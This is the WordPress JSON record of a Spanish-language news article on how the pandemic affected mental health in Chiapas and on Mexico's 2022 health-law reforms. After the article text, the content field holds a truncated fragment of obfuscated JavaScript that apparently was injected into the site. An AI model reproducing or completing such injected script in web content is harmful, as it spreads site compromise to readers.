{"id":8422,"date":"2023-01-31T02:19:35","date_gmt":"2023-01-31T02:19:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8422"},"modified":"2023-01-31T02:19:36","modified_gmt":"2023-01-31T02:19:36","slug":"pandemia-ha-impactado-en-el-tratamiento-de-la-salud-mental","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8422","title":{"rendered":"Pandemia ha impactado en el tratamiento de la salud mental"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"538\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675131537129.jpg\" alt=\"\" class=\"wp-image-8423\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675131537129.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675131537129-300x224.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 30 de enero del 2023. Tuxtla Guti\u00e9rrez.- La pandemia Covid-19 gener\u00f3 toda una serie de secuelas en la salud mental de la poblaci\u00f3n y cre\u00f3 la necesidad de elevar a rango de ley el cuidado de la misma. Esto representa un avance significativo para sentar las bases de este segmento sanitario que hist\u00f3ricamente ha sido separado de la salud f\u00edsica.<\/p>\n\n\n\n<p>De acuerdo con Jes\u00fas Valtierra Hern\u00e1ndez, director de Atenci\u00f3n de Salud Mental y Adicciones de la Secretar\u00eda de Salud, la crisis emocional dejada por la pandemia es grave y debe ser atendida.<\/p>\n\n\n\n<p>Para ello a nivel nacional en mayo del 2022, se ha llevado a cabo modificaciones a la Ley General de Salud, lo que ser\u00e1 de gran apoyo para la poblaci\u00f3n que se ve afectada.<\/p>\n\n\n\n<p>Trastornos de ansiedad, depresi\u00f3n y suicidios, se han vuelto males en los \u00faltimos a\u00f1os con una preocupante tendencia a la alza a nivel nacional y local.<\/p>\n\n\n\n<p>&#8220;Est\u00e1 modificaci\u00f3n al art\u00edculo 72 al 78 representa un gran avance en materia de salud mental, es un tema que hab\u00eda sido relegado hist\u00f3ricamente, se hab\u00eda separado de la salud f\u00edsica cuando es un complemento, uno no puedo ir sin el otro&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>\u201cEsto no habla de que, ahora la salud mental es un derecho constitucional, nos alienta a seguir trabajando en favor de la salud p\u00fablica de una manera integral\u201d, dijo.<\/p>\n\n\n\n<p>Destac\u00f3 el papel que est\u00e1n jugando algunos sectores actualmente en el tema de salud mental como es el caso de los restauranteros a trav\u00e9s de la CANIRAC.<\/p>\n\n\n\n<p>Inform\u00f3 que en conjunto est\u00e1n ofreciendo una serie de cursos especializados en salud mental al personal de los restaurantes en la entidad.<\/p>\n\n\n\n<p>Indic\u00f3 que, sumar\u00e1n esfuerzos con los diferentes sectores de la sociedad para trabajar en la consolidaci\u00f3n de un modelo para preservar la salud mental, de la que, en 2022 ya se di\u00f3 un gran avance.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 30 de enero del 2023. Tuxtla Guti\u00e9rrez.- La pandemia Covid-19 gener\u00f3 toda una serie de secuelas en la salud mental de la poblaci\u00f3n y cre\u00f3 la necesidad de elevar a rango de ley el cuidado de la misma. Esto representa un avance significativo para sentar las bases de este segmento sanitario &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8423,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8422","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8422"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8422\/revisions"}],"predecessor-version":[{"id":8424,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8422\/revisions\/8424"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8423"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}